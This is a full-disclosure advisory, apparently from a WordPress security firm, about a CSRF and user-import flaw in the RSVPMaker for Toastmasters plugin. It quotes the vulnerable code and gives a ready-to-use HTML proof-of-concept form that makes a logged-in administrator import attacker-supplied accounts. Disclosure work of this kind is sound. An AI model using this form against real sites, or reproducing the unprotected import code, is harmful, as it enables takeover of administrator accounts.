Full Disclosure of Cross-Site Request Forgery (CSRF)/User Import Vulnerability in RSVPMaker for Toastmasters
One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities before they are exploited. While we have a number of automated checks that are used to try to spot the possibility of those, most of the vulnerabilities found so far have come from only two of those. Once again, though another one of those has caught a vulnerability. This time a cross-site request forgery (CSRF)/user import vulnerability in RSVPMaker for Toastmasters, which could allow an attacker to cause a logged in Administrator user to create another Administrator account that is controlled by the attacker.
When the plugin’s Import/Export page, /wp-admin/admin.php?page=import_export, is accessed code runs that can create new WordPress users based on the contents of an URL. There is no protection against CSRF when doing that so if a hacker could get a logged in Administrator to access a page they control they could cause that to happen.
The code for that starts with this:
3868 3869 3870 | if(isset($_POST['importurl'])) { $message = file_get_contents($_POST['importurl']); |
Which gets data used to create the accounts from a URL specified with the POST input “importurl”.
Later in the code it creates user_meta database entries derived from that data:
3905 3906 3907 3908 3909 3910 3911 3912 3913 3914 3915 | foreach($user->usermeta as $meta_key => $meta_value) { //echo '< div>'.$meta_key.' value:< /div>'; if(is_serialized($meta_value)) $value = unserialize($meta_value); else $value = $meta_value; //print_r($value); //echo '< br />'; update_user_meta($member_id,$meta_key,$value); $record_count++; |
The role of the new users is specified by the “wp_capabilities” meta_key, so the new users can easily be set to be administrators.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. Hopefully they will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon).
Proof of Concept
The following proof of concept will create new WordPress users based on data on the specified URL (a sample of the format for that can be found on the plugin’s Import/Export page), when logged in as an Administrator.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[data URL]” with the URL where the data is stored.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=import_export" method="POST" > <input type="hidden" name="importurl" value="[data URL]" /> <input type="submit" value="Submit" /> </form> </body> </html>